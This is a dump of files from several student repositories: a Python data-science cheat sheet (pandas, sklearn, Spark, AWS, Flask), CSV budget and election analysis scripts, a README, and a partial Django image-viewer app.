df.rename(columns={'int_col' : 'some_other_name'}, inplace= True) #renamecolumns\ndf.info() # type of each column in df\ndf.hist('column name') #plots histogram over column (or all columns if left blank)\n<dateseries>.dt.month #to get month (or other element) from pandas datatime object\n#when grouping by in pandas, can add \"as_index = False\" to move index to top.\nseries.unique() # to pull unique values of a given series\ndf.unstack() #will switch from stacked (row-wise data) to column-wise data by the inner-most grouping index.\ndf.values #return an np.ndarray of either the dataframe or the dataframe index\n#if result of slicing is a 1D dataframe, this will be a (vertical) pd.Series, which can't be used to index. So .values will turn into a 1D array, whcih can be used to index.\ndf.values.astype(float) # returns values of a df as float\ndf.astype(float) #suffix astype allows conversion to float.\ndf.columns.values #returns an array of the column names of df\n\nimport statsmodels.api as sm # to import statsmodels package for regression capability\nsm.regression.linear_model.OLS(dependent_array, independent_dataframe).fit() #this shoudl be assigned to an <object> and then can be displayed using:\nprint <object>.summary()\nplt.scatter( credit_OLS.predict(), credit_OLS.outlier_test()['student_resid']) #plot student residuals vs fitted y's to look for outliers\nsm.qqplot(<OLS_model_object>.resid) #plot QQ plot of residuals of prevously fitted statsmodels object name. \npd.get_dummies(array) #create dummy variables\npd.set_index('column_name', inplace=True) #set column as index\npd.groupby(by=None, axis=0) #group df by first argument\ndf.iloc[<integerindex>] #allows indexing by index location in pandas dataframe\n\ndf.to_csv('filename', index=False) #write to csv\ndf.reset_index(inplace=True) #pulls index into the first column.\ndt.datetime.strptime(ginger.date[0], '%d%b%y:%H:%M:%S') #strip time data from string, requires specific flags, at the bottom of this site: https://docs.python.org/2/library/datetime.html\n#can also use after reading csv, example: ginger['date']=pd.to_datetime(ginger['date'], format='%d%b%y:%H:%M:%S')\ndf['column']=df.apply(lambda row: f(row), axis=1) #f = function to apply across each row of\ndf.column.value_counts() #value counts for a given column (similar to tabulate)\ndf[df['column'].isin([list of values])] #how to filter dataframe rows by \"within/in\"\ndf.columns=[<list of names as strings>] #to rename columns\ndf.replace(to_replace=None, value=None, inplace=True) #replace one value with another in df\ndf.fillna(value=None, axis=None, inplace=False) #fill NaN values in df\ndf.drop_duplicates(subset=None, keep='first/last', inplace=False) #drop duplicates, can specify a subset of columns to look over\n\nwho%_ls DataFrame #lists dataframes in the current workspace/memory\n\n\n# Numpy\n\nnp.linalg.norm() # get the addition of two vectors\nnp.logical_and(array1==True, array2==True) #returns boolean array corresponding to array1/2 satisfying the conditions described\narrr[(arrr[:,0]>0.6) & (arrr[:,1]<0.4)] #setting slices of an array to conditions will return an array which meets those conditions OR\nnp.array(thresholds)[(np.array(tpr)>0.6) & (np.array(fpr)<0.4)] #can even index a target array (thresholds) according to boolean statements for TWO OTHER arrays (tpr, fpr) which are the same size/shape as the target arrray (assuming of course that they reference the same data pionts)\nnp.argsort(array) #returns an array2 with the indices of the sorted input array, which you can use to iterate over sorted values. \narr[np.random.randint(0, size)] #np.random.randint returns a random integer which in this case is used to index the array randomly, with replacement. size = len(arr)\narr.tolist() #return array values as list\narr = np.array(arr) # turn a list or other object into a np array\narr.shape #returns a tuple describing the shape of the array in (rows, columns)\nnp.newaxis '''usage'''#if arr is a 1D array (ie arr.shape = (3,)), arr[np.newaxis,:] will return a row vector shaped (1,3) whereas arr[:,np.newaxis] will return a column vector shaped (3,1)\narr[np.min(array, axis = 1)>0] #np.min returns booleans for the condition >0 along rows (axis = 1)\narr = np.append(arr, item) #append item to an array. Can even initialze array without specifying shape as:\narr = np.array([]) #initialize empty array\nnp.linspace(start,stop,num=50) #create a var from start to stop with num points.\nbalance['Married'] = balance['Married'].map({'Yes': 1, 'No': 0}) #mapping to change responses from Yes to 1.\nnp.logical_not(<condition>) #allows you to exclude things in <condition> without an if statement.\nX[np.where(mask)] #turns boolean mask into array of indices\nnp.tile(X,reps) #repeat A, reps times\nnp.ravel(a) #return a continugous flattened array from a, which can be a dataframe\n\n\n# Sklearn\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = \\\ntrain_test_split(features, target, test_size=0.3) # to make test/training set for cross validation\n\n\nfrom sklearn.linear_model import LinearRegression\nlinear = LinearRegression() #instantiate the LinearRegression class\nlinear.fit(train_feature, train_target) #fit linear regression model using the object linear which is an instantiation of the LinearRegression class\n\nfrom sklearn.linear_model import LogisticRegression\nanyname = LogisticRegression()\nanyname.fit(x[['col1','col2']],y) #fit logistic regression model, using col1,2,i number of features of x\n\nfrom sklearn.cross_validation import KFold\nkf = KFold(len(array), n_folds = 5) #create Kfold indices for cross validation on array use as follows:\nfor train, test in kf: model.fit(X[train], y[train]) #usage for Kfolds cross validation\n\nfrom sklearn.preprocessing import StandardScalar\nscale = StandardScalar()\nscale.fit(training_data) #scale data\n\nfrom sklearn.grid_search import GridSearchCV #example code of how to use grid search\nparam_grid = {'learning_rate':[0.1,0.05,0.02], 'max_depth':[4,6], 'min_samples_leaf':[3,5,9,17]}\nest = GradientBoostingRegressor()\ngs_cv = GridSearchCV(est, param_grid).fit(X,y) #grid-search takes (essentially) a raw or minimally parameterized estimator Class, and performs a search across the parameter_grid for the best parameter by the given scoring method. Will automatically assign the best parameters to the gs_cv estimator object once complete.\ngs_cv.best_params_\nfrom sklearn.grid_search import RandomizedSearchCV #perform a random grid search, allows searching through a random set of the hyperparameters to get a sense of where to pick them, thus will run faster than GridSearch.\n\nfrom sklearn.cross_validation import cross_val_score\ncross_val_score(estimator_object, X, y=none, scoring = <scoring type>, cv=None) #obtains a accuracy score by cross validation. Takes a parameterized estimator object, but this object does not need to be fitted to training data, as this will take training data (x and y if available) and perform cross validation (train test, train test K-fold times) to obtain a cross-validated score. You can set the type of score using scoring = <scoring type, below>, default scoring type is the simples appropriate score for the method, such as accuracy for classifiers or R2 for regressors; y lets you set labels for supervised learning, cv defaults to 3 fold CV, can set other integer\ntypes of scores: http://scikit-learn.org/stable/modules/model_evaluation.html\n\n\n# Matplotlib\n\nplt.legend() #to have plot labels show as legend\nplt.axvline(x=0.4) #plot vertical line\nplt.axhline(y=0.6) #plot horizontal line\ndf.hist()\nplt.figure(figsize=(10,10)) #sets the figsize in matplotlib and Seaborn for the given session\nplt.savefig('example.png', dpi=300) #save figure\n#line plots\nplt.plot(x, y, marker='o', alpha=0.4, color='red')\nplt.plot(x, y2, marker='o', alpha=0.4, color='green')\n#scatter plots\nplt.scatter(x, y, edgecolor='none', s=size)\n#bar plots\nplt.bar(people_index, score, bar_width, align='center')\nplt.xticks(people_index, people)\n#histogram\n import scipy.stats as scs\n # Get a list of normally distributed values\n values = scs.norm.rvs(size=1000)\n # Plot the first histogram\n plt.hist(values, color='r', alpha=.4)\n plt.show()\n # Plot the second histogram with probability density\n plt.hist(values, color='r', alpha=.4, normed=1)\n plt.show()\n#Box plots\n import scipy.stats as scs\n one = scs.norm(3, 5).rvs(size=1000)\n two = scs.norm(5, 1).rvs(size=1000)\n data = [one, two]\n plt.boxplot(data)\n plt.xticks([1, 2], ['a', 'b'])\n plt.show()\n\n# Label axis/legend/Figure size\n fig = plt.figure(figsize=(10, 4)) # 10 wide and 4 height\n x = [1, 2, 3, 4]\n y = [2, 3, 4, 5]\n plt.plot(x, y, label='Legend 1')\n plt.xlabel('X Axis', fontsize=14, fontweight='bold')\n plt.ylabel('Y Axis', fontsize=14, fontweight='bold')\n plt.title('Title', fontsize=20, fontweight='bold')\n plt.legend(loc='upper left')\n\n#Sub plots\n x = [1, 2, 3, 4]\n y = [2, 3, 4, 5]\n \n # subplot() command specifies numrows, numcols, fignum where fignum ranges from 1 to numrows*numcols\n # Define the rows and columns of subplots (2x2). Can specify the figsize too\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize=(12,7))\n\n ax1.plot(x, y, label='first plot')\n ax1.legend(loc='upper left')\n ax1.set_xlabel('X label')\n ax1.set_ylabel('Y label')\n ax1.set_title('Title')\n #OR\n ax[0][0].plot(x, y, label='first plot')\n ax[0][0].legend(loc='upper left')\n ax[0][0].set_xlabel('X label')\n ax[0][0].set_ylabel('Y label')\n ax[0][0].set_title('Title')\n\n # Plot 1 line on the upper right\n ax2.plot(x, y, label='second plot', color='r')\n ax2.legend(loc='upper left')\n\n # Plot 1 line on the lower left\n ax3.plot(x, y, label='third plot', color='g')\n ax3.legend(loc='upper left')\n\n # Plot 1 line on the lower right\n ax4.plot(x, y, label='fourth plot', color='c')\n ax4.legend(loc='upper left')\n\n # Can set an overall title in the middle of the figure\n plt.suptitle('Overall title', fontsize=16)\n\n\n#plotting several sub-plots\ndef fig(digits):\n fig, _ = pl.subplots(nrows=10, ncols=10, figsize=(12,12))\n for i,ax in enumerate(fig.axes):\n ax.imshow(digits.images[i])\n ax.axis('off')\n plt.show()\n\n\n# Seaborn\nplotter = df.drop(['date_formatted','user_id','date','id_number','steps_list'],axis=1)\nsns.pairplot(plotter.iloc[:,0:5]) #creates pairwise scatter plots\n\n\n\n# NLTK for Natural Language Processing\nnltk.download('stopwords') #downloads stopwords for nltk\n\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\nporter = PorterStemmer()\nsnowball = SnowballStemmer('english')\nwordnet = WordNetLemmatizer()\n\n\n# PyMongo\nfrom pymongo import MongoClient\nclient = MongoClient()\n# Access/Initiate Database\ndb = client['test_database']\n# Access/Initiate Table\ntab = db['test_table']\n\nfrom bs4 import BeautifulSoup #import html parser BeautifulSoup\nsoup = BeautifulSoup(shoes, 'html.parser') #instantiate BeautifulSoup parser\nimg_array = soup.select('img.img') #select CSS elements \"img.img\" from html using BS\n\n\n# MongoDB\nUsing Mongo - General Commands for Inspecting Mongo\n help // List top level mongo commands\n db.help() // List database level mongo commands\n db.<collection name>.help() // List collection level mongo commands.\n show dbs // Get list of databases on your system\n use <database name> // Change the database that you're current using\n show collections // Get list of collections within the database that you're currently using\n\nInserting\n Once you're using a database you refer to it with the name db. Collections within databases are accessible through dot notation.\n\ndb.users.insert({ name: 'Jon', age: '45', friends: [ 'Henry', 'Ashley']})\ndb.getCollectionNames() // Another way to get the names of collections in current database\n\ndb.users.insert({ name: 'Ashley', age: '37', friends: [ 'Jon', 'Henry']})\ndb.users.insert({ name: 'Frank', age: '17', friends: [ 'Billy'], car : 'Civic'})\n\ndb.users.find()\n { \"_id\" : ObjectId(\"573a39\"), \"name\" : \"Jon\", \"age\" : \"45\", \"friends\" : [ \"Henry\", \"Ashley\" ] }\n { \"_id\" : ObjectId(\"573a3a\"), \"name\" : \"Ashley\", \"age\" : \"37\", \"friends\" : [ \"Jon\", \"Henry\" ] }\n { \"_id\" : ObjectId(\"573a3b\"), \"name\" : \"Frank\", \"age\" : \"17\", \"friends\" : [ \"Billy\" ], \"car\" : \"Civic\" }\n\nQuerying\ndb.users.find({ name: 'Jon'}) // find by single field\ndb.users.find({ car: { $exists : true } }) // find by presence of field\ndb.users.find({ friends: 'Henry' }) // find by value in array\ndb.users.find({}, { name: true }) // field selection (only return name)\ndb.users.findOne() #helpful to find one record so u can see structure\n\nUpdating\ndb.users.update({name: \"Jon\"}, { $set: {friends: [\"Phil\"]}}) // replaces friends array\ndb.users.update({name: \"Jon\"}, { $push: {friends: \"Susie\"}}) // adds to friends array\ndb.users.update({name: \"Stevie\"}, { $push: {friends: \"Nicks\"}}, true) // upsert\ndb.users.update({}, { $set: { activated : false } }, false, true) // multiple updates\n\nImports and Cursors\n To import existing data into a mongo database one uses mongoimport at the command line. In this way mongo will accept a number of data types: JSON, CSV, and TSV.\nmongoimport --db tweets --collection coffee --file coffee-tweets.json\n Now that we have some larger data we can see that returns from queries are not always so small.\n use tweets\ndb.coffee.find()\n When the return from a query will display up to the first 20 documents, after that you will need to type it to get more. The cursor that it returns is actually an object that has many methods implemented on it and supports the command it to iterate through more return items.\ndb.coffee.find().count() // 122\ndb.coffee.find().limit(2) // Only two documents\ndb.coffee.find().sort({ 'user.followers_count' : -1}).limit(3) // Top three users by followers count\n\nIteration\n MongoDB also has a flexible shell/driver. This allows you take some action based on a query or update documents. You can use an iterator on the cursor to go document by document. In the Javascript shell we can do this with Javascript's forEach. forEach is similar to Python's iteration with the for loop; however, Javascript actually has a more functional approach to this type of iteration and requires that you pass a callback, a function, similar to map and reduce.\ndb.coffee.find().forEach(function(doc) {\n doc.entities.urls.forEach(function(url) {\n db.urls.update({ 'url': url }, { $push: { 'user': doc.user } }, true)\n });\n});\n\nAggregation\n Aggregations in Mongo end up being way less pretty than in SQL/Pandas. Let's just bite the bullet and take a look:\ndb.coffee.aggregate( [ { $group :\n {\n _id: \"$filter_level\",\n count: { $sum: 1 }\n }\n}])\n Here we are first declaring that we're going to do some sort of grouping operation. Then, as Mongo desires everything to have an _id field, we specify that the _id is going to be the filter level. And then we're going to perform a sum over each level counting 1 for each observation. This information is going to be stored in a field called count. What do we get back?\n We can also do more complicated stuff as well. Here's a query that returns the average number of friends users in this dataset by country. We need to access the country code field of the place field, but that is easy with an object oriented language like JS.\ndb.coffee.aggregate( [ { $group :\n {\n _id: \"$place.country_code\",\n averageFriendCount: { $max: \"$user.friends_count\" }\n }\n}])\n\n\n\n# Boto for interaction with Amazon Web Services\nimport boto\n\n# setting up aws access keys using json\nwith open('/Users/sf321092/aws.json') as f:\n data = json.load(f)\n access_key = data['access-key']\n secret_access_key = data['secret-access-key']\n\n#open boto connection\nconn = boto.connect_s3(access_key, secret_access_key)\n\n#upload histogram to AWS S3\nbucket = conn.get_bucket('testing-geoff')\n#create a new key, which is akin to a new file in the bucket\nfile_object = bucket.new_key('geofffig.png')\n#set key contents from filename in local path\nfile_object.set_contents_from_filename('/Users/sf321092/ds/gal/daily/high-performance-python/geofffig.png')\n\n# command line code to log onto amazon instance from terminal, turns terminal into a terminal on the remote EC2 instance using ssh\nssh -X -i /Users/sf321092/.ssh/galkey.pem [email protected]\n\n# Command line code to write files to EC2 instance using scp\nscp -i /Users/sf321092/.ssh/galkey.pem /Users/sf321092/ds/gal/daily/high-performance-python/geoff_script.py ubuntu@e<public instance id>:~\n\n\n# SPARK! Distributed Data Management\nimport pyspark\nsc = ps.SparkContext('local[4]') #initiating spark context locally using 4 cores\nsc.parallelize(lst) #creates an RDD for local list lst\nsc.textFile('sales.txt') #I believe this creates an RDD from a text file\n .map(function) and .filter() # are functions you call on the sc object that perform transformations to create new RDDs from existing RDDs.\n .count() # is an action and brings the data from the RDDs back to the driver.\n .first() #an action that returns the first entry in the RDD\n .take(2) #an action that returns the first two entries in the RDD as a list\n .collect() #an action that pulls all entries in the RDD, requiring the entire RDD to fit into memory \n\n#word count example using Spark\nsc.textFile('input.txt')\\\n .flatMap(lambda line: line.split())\\\n .map(lambda word: (word, 1))\\\n .reduceByKey(lambda count1, count2: count1 + count2)\\\n .collect()\n\n # Example Spark Commands\n Expression\tMeaning\n filter(lambda x: x % 2 == 0)\tDiscard non-even elements\n map(lambda x: x * 2)\tMultiply each RDD element by 2\n map(lambda x: x.split())\tSplit each string into words\n flatMap(lambda x: x.split())\tSplit each string into words and flatten sequence\n sample(withReplacement = True, 0.25)\tCreate sample of 25% of elements with replacement\n union(rdd)\tAppend rdd to existing RDD\n distinct()\tRemove duplicates in RDD\n sortBy(lambda x: x, ascending = False)\tSort elements in descending order\n\n Common Actions\n Expression\tMeaning\n collect()\tConvert RDD to in-memory list\n take(3)\tFirst 3 elements of RDD\n top(3)\tTop 3 elements of RDD\n takeSample(withReplacement = True, 3)\tCreate sample of 3 elements with replacement\n sum()\tFind element sum (assumes numeric elements)\n mean()\tFind element mean (assumes numeric elements)\n stdev()\tFind element deviation (assumes numeric elements)\n\njson.loads()\njson.dumps() #use in mappnig functions to change items in RDD to json. read documentation\n\n# Spark Hive commands (to work with Hive data frames in Spark)\nhive_cxt = HiveContext(sc)\ndf = hive_cxt.createDataFrame(iris_pandas_df) #create df in a hive context\ndf.printSchema()\ndf.filter(df['petal_length'] > 2).rdd.map(tuple).collect() #filter using Hive\ndf.registerTempTable('iris')\nhive_cxt.sql('''SELECT * from iris\n WHERE petal_length > 2''').head(5) #SQL Hive query using Spark\n\n\n\n#Spark local UI is at localhost:8080\n\n#create local master node, run from inside master tmux session initiated by first command\ntmux new -s master #first command\n${SPARK_HOME}/bin/spark-class org.apache.spark.deploy.master.Master \\\n-h 127.0.0.1 \\\n-p 7077 \\\n--webui-port 8080\n\n#create local worker node, run from inside worker tmux session initiated by first command\ntmux new -s worker1\n${SPARK_HOME}/bin/spark-class org.apache.spark.deploy.worker.Worker \\\n-c 1 \\\n-m 1G \\\nspark://127.0.0.1:7077\n\n#start ipython notebook to interact with LOCAL spark cluster\nIPYTHON_OPTS=\"notebook\" ${SPARK_HOME}/bin/pyspark \\\n--master spark://127.0.0.1:7077 \\\n--executor-memory 1G \\\n--driver-memory 1G\n\n\n\n#Tmux, run commands in terminal\nbrew install tmux # Install tmux with homebrew\ntmux new -s [session_name] # Start a new tmux session\nctrl + b, d # Detach from that tmux session\nctrl + b, % # start a new pane in a window, horizontal\nctrl + b, double quote # start a new vertical split pain in window \nctrl + b, o # switches between various panes\ntmux ls # Get a list of your currently running tmux sessions\ntmux attach -t [session_name] # Attach to an existing session (can use a instead of attach)\ntmux kill-session -t myname #kill session\ntmux ls | grep : | cut -d. -f1 | awk '{print substr($1, 0, length($1)-1)}' | xargs kill #kill all tmux sessions\n\n\n\n\n#Spark AWS\nmv Dowloads/<pemname>.pen .ssh/ #move file from folder to .ssh/\nls -l #single file per line ls with read/write notation\nchmod 600 <filename>.pem #change read write privileges for your pem file\nls -a #hidden folders in home folder\n\n# path to spark EC2 scropt: ~/spark-1.5.0-bin-hadoop1/ec2/spark-ec2\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] -s 6 --copy-aws-credentials --ebs-vol-size=64 launch [give your cluster a name] #command line command to launch cluster using default settings\n\n#ie command line code:\n/usr/local/spark-1.5.0-bin-hadoop2.6/ec2/spark-ec2 -k sparkler -i ~/pem_files/sparkler.pem -r us-west-1 -s 6 --copy-aws-credentials --ebs-vol-size=64 launch my_cluster\n\n#scp transfer installation scripts (or files in general) to cluster master\nscp -i <path to pem file> <file to copy> root@<your master DNS>:/root/.\n\n#ie scp code to transfer files\nscp -i ~/pem_files/sparkler.pem install_scripts/install_these [email protected]:/root/.\n\n#log into cluster and run installation scripts\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] login [the name of your cluster]\n\nsource install_these # install install files from cluster master terminal\n\n#\"Pause\" or stop cluster (does not terminate)\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] stop [the name of your cluster]\n\n#restart paused/stopped cluster\n[path to your spark-ec2 script] -k [key name] -i [path to your pem file] -r [aws region] start [the name of your cluster]\n\n\n\n# Flask for python web servers\nfrom flask import Flask, request\napp = Flask(__name__) #requisite first line for a flask script, instantiating the app class for use throughout the script\[email protected]('/') #defines each page, / alone is root\napp.run(host='0.0.0.0', port=8080, debug=True) #put under main block, debug=True allows for autoreload for debugging code edits in real time\n\n\n\n\n#Pickle\nimport cPickle as pickle #cPickle is faster than pickle\n\nwith open(\"model.pkl\", 'w') as f: #how to \"pickle\" a model named model into file model.pkl\n pickle.dump(model, f)\n\nwith open(\"model.pkl\") as f_un: #to unpickle a model to use\n model_unpickled = pickle.load(f_un)\n'''\n\n\n\n```\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 23.22222137451172, "blob_id": "c13be91dd9116269a75c74c8e0c27af91c772844", "content_id": "0ca3d88ddbc8dae0a54950f8a05435f6e9f192fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 55, "num_lines": 18, "path": "/160601 Code Review Questions.py", "repo_name": "geoffisdancing/galnotes", "src_encoding": "UTF-8", "text": "# Code questions\n\n\n# array.shape[0]\ndef bootstrap(arr, iterations=10000):\n if type(arr) != np.ndarray:\n arr = np.array(arr)\n\n if len(arr.shape) < 2:\n arr = arr[:, np.newaxis]\n\n nrows = arr.shape[0]\n boot_samples = []\n for _ in xrange(iterations):\n row_inds = np.random.randint(nrows, size=nrows)\n boot_sample = arr[row_inds, :]\n boot_samples.append(boot_sample)\n return boot_samples\n" } ]
3
simoncastellanos9/python-challenge
https://github.com/simoncastellanos9/python-challenge
25d1f6bdfd80be9dccc9968c09dc102b88cc6d63
ce385bcfe599a933b1a20515bf674558b1e75042
206f7ffbdee7e62e43e961519422bb54d777e4c7
refs/heads/main
2023-04-25T04:20:29.802578
2021-05-08T19:17:11
2021-05-08T19:17:11
363,179,421
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5986021161079407, "alphanum_fraction": 0.60259610414505, "avg_line_length": 30.809524536132812, "blob_id": "ebd1c0a8891ba9f112b207921aa40ef8fe7b4c35", "content_id": "83e931b5b3ddb0faf86cf2721307a9e7512238c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2003, "license_type": "no_license", "max_line_length": 115, "num_lines": 63, "path": "/PyPoll/main.py", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "import os\nimport csv\n\ncsvpath = os.path.join('Resources','election_data.csv')\n\nwith open(csvpath) as csvfile:\n # CSV reader specifies delimiter and variable that holds contents\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n\n candidates = []\n votes = []\n perVotes = []\n electionresults = []\n maxVotes = 0\n\n #Create unique list for candidates, and initial list for votes and percentage according to number of candidates\n for row in csvreader:\n if row[2] not in candidates:\n candidates.append(row[2])\n votes.append(0)\n perVotes.append(0)\n electionresults.append(row[2])\n \n\n totalVotes = (int(len(electionresults)))\n\n #Print to terminal\n print(\"Election Results\\n-------------------------\")\n print(f\"Total Votes: {totalVotes}\\n-------------------------\")\n\n for i in range(len(candidates)):\n for candidate in electionresults:\n if candidate == candidates[i]:\n votes[i] = votes[i] + 1 \n perVotes[i] = \"{:.3%}\".format(votes[i]/totalVotes) \n print(f\"{candidates[i]}: {perVotes[i]} ({votes[i]})\")\n if votes[i] > maxVotes:\n maxVotes = votes[i]\n winner = candidates[i]\n\n print(f\"-------------------------\\nWinner: {winner}\\n-------------------------\")\n\n\ncandidatesZip = zip(candidates,perVotes,votes)\n\n\noutput_path = os.path.join(\"analysis\", \"results.csv\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w') as csvfile:\n\n # Initialize csv.writer\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n # Write the first row (column headers)\n csvwriter.writerow([\"Election Results\"])\n csvwriter.writerow(['Total Votes: ',totalVotes])\n for w in range(len(candidates)):\n csvwriter.writerows(candidatesZip)\n csvwriter.writerow(['Winner: ',winner])" }, { "alpha_fraction": 0.6009986400604248, "alphanum_fraction": 0.6105310916900635, "avg_line_length": 29.52777862548828, "blob_id": "f5fe228100fb1e0d91d319f2692a6b674381da91", "content_id": "3b177c4490f42c834ef982d269df5e09f215b56b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 112, "num_lines": 72, "path": "/PyBank/main.py", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "import os\nimport csv\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\nwith open(csvpath) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n\n total = 0\n i = 0\n length = 0\n prevRow = 0\n change = 0\n changeCnt = 0\n greatInc = 0\n greatDec = 0\n\n #Calculate info from csv file\n for row in csvreader:\n total = total + int(row[1])\n #has to start counting change at second row\n length = length + 1\n if length>1:\n change = int(row[1])-prevRow\n if change > greatInc:\n greatInc = change\n greatIncMonth = row[0]\n if change < greatDec:\n greatDec = change\n greatDecMonth = row[0]\n changeCnt = changeCnt + change\n #place holder to calculate difference\n prevRow = int(row[1])\n \n #Format to currency\n total = \"${:.0f}\".format(total)\n aveChange = \"${:.2f}\".format(int(changeCnt/(length-1)))\n greatInc = \"${:.0f}\".format(greatInc)\n greatDec = \"${:.0f}\".format(greatDec)\n\n #Print to terminal\n print(\"\\nFinancial Analysis\\n----------------------------\")\n print(f\"Total Months: {length}\")\n print(f\"Total: {total}\")\n print(f\"Average Change: {aveChange}\")\n print(f\"Greatest Increase in Profits: {greatIncMonth} ({greatInc})\")\n print(f\"Greatest Decrease in Profits: {greatDecMonth} ({greatDec})\")\n\n\nindex = [\"Total Months\",\"Total\",\"Average Change\", \"Greatest Increase in Profits\",\"Greatest Decrease in Profits\"]\nvar = [length,total,aveChange,greatInc,greatDec]\nmont = [\"\",\"\",\"\",greatIncMonth,greatDecMonth]\n\nrows = zip(index, var, mont)\n\noutput_path = os.path.join(\"analysis\", \"results.csv\")\n\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w') as csvfile:\n\n # Initialize csv.writer\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n # Write the first row (column headers)\n csvwriter.writerow([\"Financial Analysis\", \"QTY\", \"Month\"])\n\n #Write the second row\n for w in range(5):\n csvwriter.writerows(rows)\n \n" }, { "alpha_fraction": 0.7714460492134094, "alphanum_fraction": 0.7714460492134094, "avg_line_length": 57.32143020629883, "blob_id": "17613443257da9e3d1698ec419e88a66feddff35", "content_id": "b64a5b75539cc5216f0c0d54ec45a7aa18a1aca8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1632, "license_type": "no_license", "max_line_length": 246, "num_lines": 28, "path": "/README.md", "repo_name": "simoncastellanos9/python-challenge", "src_encoding": "UTF-8", "text": "# python-challenge\nFinancial Record &amp; Voter Analysis\n\nPyBank\n\n- This python script analyzes the financial records of my company. We are given a set of financial data called budget_data.csv. The dataset is composed of two columns: `Date` and `Profit/Losses`. This script calculates and displays the following:\n - The total number of months included in the dataset\n - The net total amount of \"Profit/Losses\" over the entire period\n - The average of the changes in \"Profit/Losses\" over the entire period\n - The greatest increase in profits (date and amount) over the entire period\n - The greatest decrease in losses (date and amount) over the entire period\n\n- In addition, the script both prints the analysis to the terminal and export a text file with the results.\n\nPyPoll\n\n- For this challenge, we were tasked with helping a small, rural town modernize its vote counting process.\n\n- We were given a set of poll data called election_data.csv. The dataset is composed of three columns: `Voter ID`, `County`, and `Candidate`. Our task was to create a Python script that analyzed the votes and calculated each of the following:\n - The total number of votes casted\n - A complete list of candidates who received votes\n - The percentage of votes each candidate won\n - The total number of votes each candidate won\n - The winner of the election based on popular vote.\n \n- In addition, the final script both prints the analysis to the terminal and exports a text file with the results.\n\n **The election_data.csv file given was too big to upload into the github repository. Had to use gitignore so that the code could still run." } ]
3
illbelove/testrepo
https://github.com/illbelove/testrepo
73c4842a7faf7fe800131bc21e556088a5b99b8e
f36438c050054f7f0ceac0727e57c9e091dd1b3b
72c030d321bd4a584e190d8879363bd209db44e9
refs/heads/main
2022-12-28T13:37:15.488127
2020-10-18T03:22:45
2020-10-18T03:22:45
304,928,362
0
0
null
2020-10-17T17:07:26
2020-10-18T03:01:32
2020-10-18T03:22:46
Python
[ { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 21.5, "blob_id": "2387e9b7ee4963f175fd2fbb8375c27ac1db0e0f", "content_id": "3b8f767186405aea38df02cf4e716f1dc961a5bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/firstpython.py", "repo_name": "illbelove/testrepo", "src_encoding": "UTF-8", "text": "# display of output\nprint(\"New Python file\")\n" } ]
1
FelipeLeal/django_images
https://github.com/FelipeLeal/django_images
ba372307df82b3d1959c38b9f39e0a01357be021
58b5c01bd2733283775e74b84b9f0b0365f2a900
b47fdabe99335e2ad1b1d6f99b51f54133581f58
refs/heads/master
2021-09-24T16:42:14.067073
2020-04-12T04:50:19
2020-04-12T04:50:19
245,237,592
0
0
null
2020-03-05T18:22:47
2020-04-12T04:50:46
2021-09-22T18:52:11
Python
[ { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 22.272727966308594, "blob_id": "17d1581e4dae51d8bb1cf8755ebdf9aa7b8bee6f", "content_id": "6a3521b542a2ab5997704843f699b070a00679df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 255, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/viewer/admin.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Photo\n\nclass AdminPhoto(admin.ModelAdmin):\n list_display = ['nickname', 'petname', 'image url', 'rank']\n\n class Meta:\n model = Photo\n\n# Register your models here.\nadmin.site.register(Photo)" }, { "alpha_fraction": 0.6424078941345215, "alphanum_fraction": 0.6424078941345215, "avg_line_length": 33.78125, "blob_id": "57159f256550f4960751c2114df7efb333f9f4b0", "content_id": "a8312c2baf29562a4d3ee6efe9cf12c8ece1152a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 77, "num_lines": 32, "path": "/viewer/views.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect\nfrom django.core.files.storage import FileSystemStorage\nfrom .forms import PhotoForm\nfrom .models import Photo\n\n# Create your views here.\n\ndef home(request):\n images = Photo.objects.all()\n return render(request, 'index.html', {'title': 'home' ,'images': images})\n\ndef simple_upload(request):\n # TODO: Make a form to catch values to insert on database\n if request.method == 'POST' and 